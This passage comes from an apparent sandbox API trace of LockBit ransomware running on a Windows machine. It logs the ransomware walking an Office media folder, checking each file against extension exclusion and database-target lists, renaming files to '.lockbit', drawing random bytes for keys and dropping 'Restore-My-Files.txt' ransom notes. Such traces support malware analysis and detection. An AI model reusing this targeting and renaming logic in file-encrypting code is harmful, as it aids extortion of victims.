lpString2="BD21294_.GIF") returned -1 [0204.063] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21294_.GIF") returned 1 [0204.063] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21294_.GIF") returned 1 [0204.063] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.063] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF") returned=".GIF" [0204.063] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.064] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.064] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF.lockbit") returned 78 [0204.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21294_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.065] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.065] malloc (_Size=0x40068) returned 0x1ff1e60 [0204.065] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=122) returned 1 [0204.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0204.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0204.066] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0204.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.071] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.071] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.071] free (_Block=0x1fa2ed8) [0204.072] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.072] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.072] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436a3c00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x436a3c00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21295_.GIF", cAlternateFileName="")) returned 1 [0204.072] lstrcmpiW (lpString1=".", lpString2="BD21295_.GIF") returned -1 [0204.072] lstrcmpiW (lpString1="..", lpString2="BD21295_.GIF") returned -1 [0204.072] PathFindExtensionW (pszPath="BD21295_.GIF") returned=".GIF" [0204.072] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.072] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.072] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.073] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.073] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.073] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21295_.GIF") returned 1 [0204.073] lstrcmpiW (lpString1="ntldr", lpString2="BD21295_.GIF") returned 1 [0204.073] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21295_.GIF") returned 1 [0204.073] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21295_.GIF") returned 1 [0204.073] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21295_.GIF") returned -1 [0204.073] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21295_.GIF") returned 1 [0204.073] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21295_.GIF") returned 1 [0204.073] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.073] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF") returned=".GIF" [0204.073] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.073] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.073] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.073] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.074] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.074] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.074] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF.lockbit") returned 78 [0204.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21295_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.075] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.075] malloc (_Size=0x40068) returned 0x1ff1e60 [0204.075] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=150) returned 1 [0204.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0204.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0204.076] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0204.077] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.077] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.077] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0204.079] free (_Block=0x1fa2ed8) [0204.079] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.079] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.079] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.079] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45cc9600, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x45cc9600, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21296_.GIF", cAlternateFileName="")) returned 1 [0204.096] lstrcmpiW (lpString1=".", lpString2="BD21296_.GIF") returned -1 [0204.096] lstrcmpiW (lpString1="..", lpString2="BD21296_.GIF") returned -1 [0204.096] PathFindExtensionW (pszPath="BD21296_.GIF") returned=".GIF" [0204.096] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.096] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.096] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.096] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.096] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.096] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.097] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.097] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21296_.GIF") returned 1 [0204.098] lstrcmpiW (lpString1="ntldr", lpString2="BD21296_.GIF") returned 1 [0204.098] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21296_.GIF") returned 1 [0204.098] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21296_.GIF") returned 1 [0204.098] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21296_.GIF") returned -1 [0204.098] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21296_.GIF") returned 1 [0204.098] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21296_.GIF") returned 1 [0204.098] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.098] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF") returned=".GIF" [0204.098] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.098] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.098] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.099] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.099] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.099] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.099] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.099] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.099] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF.lockbit") returned 78 [0204.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21296_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.101] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.101] malloc (_Size=0x40068) returned 0x3d70450 [0204.101] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=148) returned 1 [0204.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.102] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.106] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.106] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.106] free (_Block=0x1fa2ed8) [0204.106] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.106] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.106] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.106] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, 